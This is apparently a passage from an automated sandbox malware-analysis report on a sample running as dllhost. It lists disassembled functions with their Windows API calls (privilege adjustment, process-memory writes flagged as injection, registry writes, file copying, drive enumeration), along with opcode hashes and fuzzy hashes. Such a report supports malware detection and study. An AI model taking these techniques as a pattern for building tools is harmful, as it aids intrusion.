Instruction Fuzzy Hash: 6421AD755097809FDB22CF25DC54B52BFF4EF06310F08849AE985CB263D331A848CB62

Function 0082B4B1 Relevance: 1.6, APIs: 1, Instructions: 57nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 0082B51D

Memory Dump Source

Source File: 00000027.00000002.2180576742.000000000082A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0082A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_82a000_dllhost.jbxd

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: 6a43584edd584eea88743175be871b618cc737af2c029bc161748cd1e63aea41
Instruction ID: 8f39909da964fcfa1484af3c3e4e6317127748c3dc3565debf96273b97d42943
Opcode Fuzzy Hash: 6a43584edd584eea88743175be871b618cc737af2c029bc161748cd1e63aea41
Instruction Fuzzy Hash: 6C118E724093C09FDB228F15DC45A52FFB4FF16324F0980DAE9848F263D265A918CB62

Function 0082B366 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 0082B3AF

Memory Dump Source

Source File: 00000027.00000002.2180576742.000000000082A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0082A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_82a000_dllhost.jbxd

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: 00dc36ec780cb202cddc31a3bbce8083898759f207135666d0ac57fc1fb31a82
Instruction ID: 23d3593850baea85dba745f9fb8511efe9881767a34847df893583a2e78e28fa
Opcode Fuzzy Hash: 00dc36ec780cb202cddc31a3bbce8083898759f207135666d0ac57fc1fb31a82
Instruction Fuzzy Hash: 2B11A0315056049FEB20CF55E884B66FBE4FF04320F08C8AAED45CB661D332E854DB61

Function 0082B4E2 Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 0082B51D

Memory Dump Source

Source File: 00000027.00000002.2180576742.000000000082A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0082A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_82a000_dllhost.jbxd

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: ba07d848da2ef7b19def135bb880629213712ac68a72c9578a04b1ab4ea17a39
Instruction ID: ae3b55c8498db5e794e789ec343c1d28fecbf8a8be61e0c0c5023efc16b194ba
Opcode Fuzzy Hash: ba07d848da2ef7b19def135bb880629213712ac68a72c9578a04b1ab4ea17a39
Instruction Fuzzy Hash: 9E018F754052449FEB218F05E945B61FBE0FF14324F08C49ADE494B262C376E858DFA2

Function 009A0080 Relevance: 2.6, Strings: 2, Instructions: 72
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

dS|l, xrefs: 009A01B9
:@Ul, xrefs: 009A0100

Memory Dump Source

Source File: 00000027.00000002.2184829758.00000000009A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_9a0000_dllhost.jbxd

Similarity

API ID:
String ID: :@Ul$dS|l
API String ID: 0-1394735054
Opcode ID: b630d457b43e50ebd582ecd6f58c719467e90a73d81aa553a6fb3bb1b546d130
Instruction ID: eee0e477be2725568bf43c21e84fdec159ceff22ace39930ec092cd2a7fd9715
Opcode Fuzzy Hash: b630d457b43e50ebd582ecd6f58c719467e90a73d81aa553a6fb3bb1b546d130
Instruction Fuzzy Hash: 39318F74900741DBD308EB3AFA4635ABBE2BFD4304F54C93DC5088B268EF755A658B82

Function 009A0090 Relevance: 2.6, Strings: 2, Instructions: 69
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

dS|l, xrefs: 009A01B9
:@Ul, xrefs: 009A0100

Memory Dump Source

Source File: 00000027.00000002.2184829758.00000000009A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_9a0000_dllhost.jbxd

Similarity

API ID:
String ID: :@Ul$dS|l
API String ID: 0-1394735054
Opcode ID: 7159ece7f0636210908c73836f78c13fa818db76aa1c2d739e11a1720887966c
Instruction ID: fec87deb88d271e1d135c70577dfb2a64c9222fefd51efd80474eba62e3cbc20
Opcode Fuzzy Hash: 7159ece7f0636210908c73836f78c13fa818db76aa1c2d739e11a1720887966c
Instruction Fuzzy Hash: 97218E34900741DBD308EB7AFA4671ABBE2BFD4304F54C93DC5048B268EF7156658B82

Function 00B40A46 Relevance: 2.5, Strings: 2, Instructions: 16
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

E, xrefs: 00B40A49
5, xrefs: 00B40A6C

Memory Dump Source

Source File: 00000027.00000002.2185108466.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_b40000_dllhost.jbxd

Similarity

API ID:
String ID: 5$E
API String ID: 0-717204176
Opcode ID: 04f539c5b272e9e01b7a6ce077588b8972ae686ad443b4d017278c1f3b0753fa
Instruction ID: f9f48b4ad4fbce1e4455286024f75b756b682e89e9d3773cc71931325dae457d
Opcode Fuzzy Hash: 04f539c5b272e9e01b7a6ce077588b8972ae686ad443b4d017278c1f3b0753fa
Instruction Fuzzy Hash: 52D05E70806306CFCF419F60985919C3BF4FF81355B44424D9001AE68ACA3C4625DB01

Function 00B40140 Relevance: 2.5, Strings: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

/, xrefs: 00B4065E
B, xrefs: 00B40144

Memory Dump Source

Source File: 00000027.00000002.2185108466.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_b40000_dllhost.jbxd

Similarity

API ID:
String ID: /$B
API String ID: 0-2775194069
Opcode ID: f023dddb7350009e3a11263a54400805782355b6193c973ce43e8399edc6a126
Instruction ID: 5c745643cf5fd3556db0ba1fe892136c8511975c30d781bbdb0df7dcd6abbd52
Opcode Fuzzy Hash: f023dddb7350009e3a11263a54400805782355b6193c973ce43e8399edc6a126
Instruction Fuzzy Hash: 44D05B649063559BDF016F6089583687FF5AF41340F4445D5E24A6F2C7D93C85009755

Function 0082A793 Relevance: 1.6, APIs: 1, Instructions: 98
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0082A849

Memory Dump Source

Source File: 00000027.00000002.2180576742.000000000082A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0082A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_82a000_dllhost.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 6c6ab295e923e8468dd3605ecadcaead8a88dd88efb85b23848c8e048c68d5ad
Instruction ID: 614e23ad782343b1bc14f5397326ff084f006af14a41b7458d8eca979109c140
Opcode Fuzzy Hash: 6c6ab295e923e8468dd3605ecadcaead8a88dd88efb85b23848c8e048c68d5ad
Instruction Fuzzy Hash: DE3181B5505380AFE722CB25DC45B62BFF8EF05314F08849AE9858B262D375E909CB72

Function 0082B62E Relevance: 1.6, APIs: 1, Instructions: 89
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNELBASE(?,?), ref: 0082B6D5

Memory Dump Source

Source File: 00000027.00000002.2180576742.000000000082A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0082A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_82a000_dllhost.jbxd

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: baac222b3f59d3dea5d5e598eccbc49b8c23e2047c21a5c56c7dfbc3e3970d34
Instruction ID: 4529fbfc576f50afa58ac5226988c3021d14cec41230ed192070fac4c7b29ce6
Opcode Fuzzy Hash: baac222b3f59d3dea5d5e598eccbc49b8c23e2047c21a5c56c7dfbc3e3970d34
Instruction Fuzzy Hash: BC31B1B55093806FE711CB65DC89BA6FFF8EF06310F08849AE944CB292D375E908C762

Function 0082A120 Relevance: 1.6, APIs: 1, Instructions: 86
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindNextFileW.KERNELBASE(?,00000E24,?,?), ref: 0082A1C2

Memory Dump Source

Source File: 00000027.00000002.2180576742.000000000082A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0082A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_82a000_dllhost.jbxd

Similarity

API ID: FileFindNext
String ID:
API String ID: 2029273394-0
Opcode ID: 768d8cbc60cfc7fa2aa0186bca055a600d781b19657096b6a579c07a364e10ac
Instruction ID: eed2f309b7a605e8d07fced37f8bfe1104a26382f2d19342678da3c22cfa1d1f
Opcode Fuzzy Hash: 768d8cbc60cfc7fa2aa0186bca055a600d781b19657096b6a579c07a364e10ac
Instruction Fuzzy Hash: A231737150D3C06FD3128B258C51BA6BFB4EF47610F1945DBD884CF1A3D269A919C7A2

Function 0082AF4A Relevance: 1.6, APIs: 1, Instructions: 85
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryValueExW.KERNELBASE(?,00000E24,D65026C2,00000000,00000000,00000000,00000000), ref: 0082AFF0

Memory Dump Source

Source File: 00000027.00000002.2180576742.000000000082A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0082A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_82a000_dllhost.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 95a6f241c9e158662bb8e777ae68f91d0d010e6c3f1d61902473a967403f5bb3
Instruction ID: 51901a8cda2d85ef8c9202ad7b118117f8bbbb888efcf31a53a128b1db2364cf
Opcode Fuzzy Hash: 95a6f241c9e158662bb8e777ae68f91d0d010e6c3f1d61902473a967403f5bb3
Instruction Fuzzy Hash: 622181B65097406FD722CF51DC44FA6BBF8EF06310F08849AE985CB192D724E948C762

Function 0082A8A0 Relevance: 1.6, APIs: 1, Instructions: 80
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileType.KERNELBASE(?,00000E24,D65026C2,00000000,00000000,00000000,00000000), ref: 0082A935

Memory Dump Source

Source File: 00000027.00000002.2180576742.000000000082A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0082A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_82a000_dllhost.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 93e2522e882cfe77b4ab88faf4c6e2e308638ff3f12f745005241e93c8e6c4b8
Instruction ID: c389bd89703b550355442b4abfd844bbf5ca2564541f04cef2d9e28b0006b40e
Opcode Fuzzy Hash: 93e2522e882cfe77b4ab88faf4c6e2e308638ff3f12f745005241e93c8e6c4b8
Instruction Fuzzy Hash: 0A21F8B54097806FE7128B21DC45BB6BFACEF46720F0980DAED848B193D264AD49C772

Function 0082B046 Relevance: 1.6, APIs: 1, Instructions: 77
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegSetValueExW.KERNELBASE(?,00000E24,D65026C2,00000000,00000000,00000000,00000000), ref: 0082B0DC

Memory Dump Source

Source File: 00000027.00000002.2180576742.000000000082A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0082A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_82a000_dllhost.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 41792207a53207a0f94909578710afa4c91ace1a4b04341d24dbce25c12eedfe
Instruction ID: 2c4ee065991daa3fca2274a325354c49e51b39b7f9e1ac8cc00d844b6a65165c
Opcode Fuzzy Hash: 41792207a53207a0f94909578710afa4c91ace1a4b04341d24dbce25c12eedfe
Instruction Fuzzy Hash: 062190B65097806FE7228B11DC45F67BFF8EF46310F08849AE985CB252D364E848CBB1

Function 0082A7CA Relevance: 1.6, APIs: 1, Instructions: 76
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0082A849

Memory Dump Source

Source File: 00000027.00000002.2180576742.000000000082A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0082A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_82a000_dllhost.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: e6f66fabac0847b56a1317925fc206b8ba1b29e8ae5c82dfa5228df0edb2a01c
Instruction ID: 7e1b8816cd4d147e9fd78427b64ff18055beff5c5b36849600bf3efd083d5fb1
Opcode Fuzzy Hash: e6f66fabac0847b56a1317925fc206b8ba1b29e8ae5c82dfa5228df0edb2a01c
Instruction Fuzzy Hash: C621A175504240AFEB21CF65DD45B66FBE8FF08714F04886AE945CB251D371E845CB62

Function 0082AD1A Relevance: 1.6, APIs: 1, Instructions: 74
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLogicalDrives.KERNELBASE ref: 0082ADA1

Memory Dump Source

Source File: 00000027.00000002.2180576742.000000000082A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0082A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_82a000_dllhost.jbxd

Similarity

API ID: DrivesLogical
String ID:
API String ID: 999431828-0
Opcode ID: b5cbd50a42968cc953c8b8da122ad452f9978471235a5530f5a1e3c7b97f302e
Instruction ID: 81fecec6a3b20ad95619f6f9b31dab007fc133237047aa39834df9ca6b510074
Opcode Fuzzy Hash: b5cbd50a42968cc953c8b8da122ad452f9978471235a5530f5a1e3c7b97f302e
Instruction Fuzzy Hash: 3B214A7140E3C05FD7038B259C65691BFB4EF07220F0A84DBD985CF1A3D2296849CB72

Function 0082B662 Relevance: 1.6, APIs: 1, Instructions: 72
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNELBASE(?,?), ref: 0082B6D5

Memory Dump Source

Source File: 00000027.00000002.2180576742.000000000082A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0082A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_82a000_dllhost.jbxd

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: c02d8847ab1475fa2c1bc81a8fd2e51b0072ff1ef7179a5057c79242a7bdf583
Instruction ID: 969c198cda18dce590ec1b3a62aa356baa34b3718b74b7bda8ed97cc094643f6
Opcode Fuzzy Hash: c02d8847ab1475fa2c1bc81a8fd2e51b0072ff1ef7179a5057c79242a7bdf583
Instruction Fuzzy Hash: 6321CF75505240AFE720DF25DD89BA6FBE8EF14324F0884AAED48CB291D371E844CA72

Function 0082AA52 Relevance: 1.6, APIs: 1, Instructions: 70
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadFile.KERNELBASE(?,00000E24,D65026C2,00000000,00000000,00000000,00000000), ref: 0082AAD1

Memory Dump Source

Source File: 00000027.00000002.2180576742.000000000082A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0082A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_82a000_dllhost.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 5bf01acfcf7f8f1255c9cb2a7a4864a54690b21d1b9026a35fcb2ea4ce07fbdb
Instruction ID: edc20dfededc269973cda797954fe0575d02ddbcbc8125e97843f5fdc7d67029
Opcode Fuzzy Hash: 5bf01acfcf7f8f1255c9cb2a7a4864a54690b21d1b9026a35fcb2ea4ce07fbdb
Instruction Fuzzy Hash: 7D219276409380AFE722CF51DC44F67BFB8EF45320F08849AE9459B152D275A548CBB2

Function 0082AF76 Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,00000E24,D65026C2,00000000,00000000,00000000,00000000), ref: 0082AFF0

Memory Dump Source

Source File: 00000027.00000002.2180576742.000000000082A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0082A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_82a000_dllhost.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: dc50e0a98991e5ebc69261aba594c2904849dfb856d1d507adcb4d103d5c3f23
Instruction ID: ecfe400a2c4c7d522dd3a4d7d112fa736696f154a732815a94bfe5c364cbff6d
Opcode Fuzzy Hash: dc50e0a98991e5ebc69261aba594c2904849dfb856d1d507adcb4d103d5c3f23
Instruction Fuzzy Hash: F7219DB5600604AFE721CE15DD84F66F7E8EF04714F08845AEE45CB291D774E888CAB2

Function 0082A589 Relevance: 1.6, APIs: 1, Instructions: 67injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0082A608

Memory Dump Source

Source File: 00000027.00000002.2180576742.000000000082A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0082A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_82a000_dllhost.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: cfe25e7edaf362f545ffb5690ca2643f0bd92050589727f49ae6834aac5c09c4
Instruction ID: ae5da11c4eece601b7b657138fa0d06fa95cd59e64de9ec53d70758ee6d92060
Opcode Fuzzy Hash: cfe25e7edaf362f545ffb5690ca2643f0bd92050589727f49ae6834aac5c09c4
Instruction Fuzzy Hash: 2B2179754093C09FDB228F21DC54A62FFB4EF17310F0984CBED848B1A3D265A949DB62

Function 0082ADE8 Relevance: 1.6, APIs: 1, Instructions: 66fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNELBASE(?,?,?), ref: 0082AE56

Memory Dump Source

Source File: 00000027.00000002.2180576742.000000000082A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0082A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_82a000_dllhost.jbxd

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: f198a9f74c1f3927f925d4c3c6493c8b8085ab68c860070be036e72c80bc77a5
Instruction ID: 0240938bb7ece2fcc165a3c051698e92a0112ead14b66361ebc4a12fb0aca248
Opcode Fuzzy Hash: f198a9f74c1f3927f925d4c3c6493c8b8085ab68c860070be036e72c80bc77a5
Instruction Fuzzy Hash: 3C2193755093805FD711CF65DC45B52BFE8EF06310F0984AAEC85CB262D224E848CB61

Function 0082B06A Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON

Download Yara Rule

APIs

RegSetValueExW.KERNELBASE(?,00000E24,D65026C2,00000000,00000000,00000000,00000000), ref: 0082B0DC

Memory Dump Source

Source File: 00000027.00000002.2180576742.000000000082A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0082A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_82a000_dllhost.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: e8fb05d2b51df1166a66f05b9ee6f550c66a1b7e01cbdd155bb6e592bf816db7
Instruction ID: b53a75bf7fa7cbe499ded3e139fdb1d65d0bfb75bfd373cfdfc181c051f61548
Opcode Fuzzy Hash: e8fb05d2b51df1166a66f05b9ee6f550c66a1b7e01cbdd155bb6e592bf816db7
Instruction Fuzzy Hash: A11190B6504604AFEB218E15DC85F67FBECEF04724F08845AEE45DB251D774E844CAB2

Function 0082B1C6 Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 0082B22E

Memory Dump Source

Source File: 00000027.00000002.2180576742.000000000082A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0082A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_82a000_dllhost.jbxd

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 682c6bd8f1a0f00cd279a941e2d325c28b8ae98dfc5bf143dfff0184d14afe16
Instruction ID: ade78538f8a0ef33103a488765fb2b272cd60b1753990a3d6e12702f47983cbd
Opcode Fuzzy Hash: 682c6bd8f1a0f00cd279a941e2d325c28b8ae98dfc5bf143dfff0184d14afe16
Instruction Fuzzy Hash: 6D118171605380AFDB11CE15DC44B57BFE8EF55720F0884AAED45CB252D265E844CB61

Function 0082AA72 Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?,00000E24,D65026C2,00000000,00000000,00000000,00000000), ref: 0082AAD1

Memory Dump Source

Source File: 00000027.00000002.2180576742.000000000082A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0082A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_82a000_dllhost.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: a95a367350a2c585aa4cafa6ce36738b176c09dad02157b17803041308416acd
Instruction ID: 14bafefcec78a37f21a3e5ebeb359057a1d12606c51302fede96c2cb58f73622
Opcode Fuzzy Hash: a95a367350a2c585aa4cafa6ce36738b176c09dad02157b17803041308416acd
Instruction Fuzzy Hash: DD110175504204AFEB21CF51DD44FAAFBE8EF04324F08845AEE458B251C375A444CBB2

Function 0082A63B Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(?), ref: 0082A6A8

Memory Dump Source

Source File: 00000027.00000002.2180576742.000000000082A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0082A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_82a000_dllhost.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: cf7bafb6e4bcaeadd698d38267b6225bd5b31b5a8db022cc10cc7139c99b76c4
Instruction ID: e4aaaa3443b7fd4bb43eb69d5c9d7cd0942bf4e4095645316ea06db8926d79a4
Opcode Fuzzy Hash: cf7bafb6e4bcaeadd698d38267b6225bd5b31b5a8db022cc10cc7139c99b76c4
Instruction Fuzzy Hash: 6811BE754097C05FDB128B21DC45692BFB4EF07320F0984DBDC888F163D224A949CB62

Function 0082AE0E Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNELBASE(?,?,?), ref: 0082AE56

Memory Dump Source

Source File: 00000027.00000002.2180576742.000000000082A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0082A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_82a000_dllhost.jbxd

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: 2c6b83c04efd01a2617cfad8a55df3bcfb05fbb277ebaf98624539a703a1f5cd
Instruction ID: 09d62a3e0149adebb530af7ea762f333e0948da84088400abb91fa02dece544c
Opcode Fuzzy Hash: 2c6b83c04efd01a2617cfad8a55df3bcfb05fbb277ebaf98624539a703a1f5cd
Instruction Fuzzy Hash: D911A1756042409FEB54CF69EC85B66FBE8EF04724F08C4AAED49CB251D335E844CA72

Function 0082B1E6 Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 0082B22E

Memory Dump Source

Source File: 00000027.00000002.2180576742.000000000082A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0082A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_82a000_dllhost.jbxd

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 2c6b83c04efd01a2617cfad8a55df3bcfb05fbb277ebaf98624539a703a1f5cd
Instruction ID: 13aec0a0f9858475b96e53892a7e1f0899e7d86a7852ad9917686f4fcb5b08f2
Opcode Fuzzy Hash: 2c6b83c04efd01a2617cfad8a55df3bcfb05fbb277ebaf98624539a703a1f5cd
Instruction Fuzzy Hash: 5D118E71605340DFEB10CF69E885B6AFBE8EF14720F0884AAED49CB652D735E844CA61

Function 0082AC8C Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

FindClose.KERNELBASE(?), ref: 0082ACE0

Memory Dump Source

Source File: 00000027.00000002.2180576742.000000000082A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0082A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_82a000_dllhost.jbxd

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 41b927603e12238063c4e891853bccf1b76702147da6bddc372c3a4df11a9d54
Instruction ID: ecdc023b943f268ddde854a071a4348c59096712e2a57446f22100cd04d2bd1f
Opcode Fuzzy Hash: 41b927603e12238063c4e891853bccf1b76702147da6bddc372c3a4df11a9d54
Instruction Fuzzy Hash: 5811E1715093809FDB128F15DC94B52FFB4EF06320F0880DBED858B2A3D264A848CB62

Function 0082A8E2 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(?,00000E24,D65026C2,00000000,00000000,00000000,00000000), ref: 0082A935

Memory Dump Source

Source File: 00000027.00000002.2180576742.000000000082A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0082A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_82a000_dllhost.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: fc9ca99bcd94932099d30954da4fc6a423eff2532ee240eaf6cfa43133ee9b68
Instruction ID: 0beda555bfff63bd8ded5c6a4826b51e9ddbd4865c5df7779ab274164c641dad
Opcode Fuzzy Hash: fc9ca99bcd94932099d30954da4fc6a423eff2532ee240eaf6cfa43133ee9b68
Instruction Fuzzy Hash: DF01C479504204AFE710CF06DC45BBAFB9CEF44724F14C09AEE449B251D374A9848AB6

Function 0082A172 Relevance: 1.5, APIs: 1, Instructions: 47fileCOMMON

Download Yara Rule

APIs

FindNextFileW.KERNELBASE(?,00000E24,?,?), ref: 0082A1C2

Memory Dump Source

Source File: 00000027.00000002.2180576742.000000000082A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0082A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_82a000_dllhost.jbxd

Similarity

API ID: FileFindNext
String ID:
API String ID: 2029273394-0
Opcode ID: e7eedcf6191678a1d19817134af2048ede422f8514a11d5728be2a646c565f10
Instruction ID: 9039b23207f139fae7b08e3084f9d82dc9b61513daae8f78649a347373f8c33c
Opcode Fuzzy Hash: e7eedcf6191678a1d19817134af2048ede422f8514a11d5728be2a646c565f10
Instruction Fuzzy Hash: 12017171600200AFD310DF16DC45B76FBE8EB88A20F14856AED089B751D775F915CBE6

Function 0082A5C2 Relevance: 1.5, APIs: 1, Instructions: 43injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0082A608

Memory Dump Source

Source File: 00000027.00000002.2180576742.000000000082A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0082A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_82a000_dllhost.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 50a01142eafb81eff0710d293a2f8457c175fe4fb2e222ec23b137b56907f268
Instruction ID: 4ae7fdc6a41cb497feb1b9e791df8db64a26817d36538813e91d9e85424057e7
Opcode Fuzzy Hash: 50a01142eafb81eff0710d293a2f8457c175fe4fb2e222ec23b137b56907f268
Instruction Fuzzy Hash: 1D01C035500200DFEB20CF05E884B62FBE4FF14310F0C809ADE458B261C331E898CE62

Function 0082ACAE Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

FindClose.KERNELBASE(?), ref: 0082ACE0

Memory Dump Source

Source File: 00000027.00000002.2180576742.000000000082A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0082A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_82a000_dllhost.jbxd

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: ccfcbfec4095999b4dd1e1a24df6abec5d77a18cafedc249f4ccad8e4194c278
Instruction ID: e87ba1fb7b139e42faecf2196502b1a8f587d49e7b4d6ef4f9e7c1830605e6ab
Opcode Fuzzy Hash: ccfcbfec4095999b4dd1e1a24df6abec5d77a18cafedc249f4ccad8e4194c278
Instruction Fuzzy Hash: 1B01F4355042448FEB208F15E985761FBE4EF04325F08C0ABDD098B752D375E888CEA3

Function 0082AD72 Relevance: 1.5, APIs: 1, Instructions: 38COMMON

Download Yara Rule

APIs

GetLogicalDrives.KERNELBASE ref: 0082ADA1

Memory Dump Source

Source File: 00000027.00000002.2180576742.000000000082A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0082A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_82a000_dllhost.jbxd

Similarity

API ID: DrivesLogical
String ID:
API String ID: 999431828-0
Opcode ID: 2bceda2a2df59ee45f653468aae4920ff2d730ff1de33914653738577d68f5e0
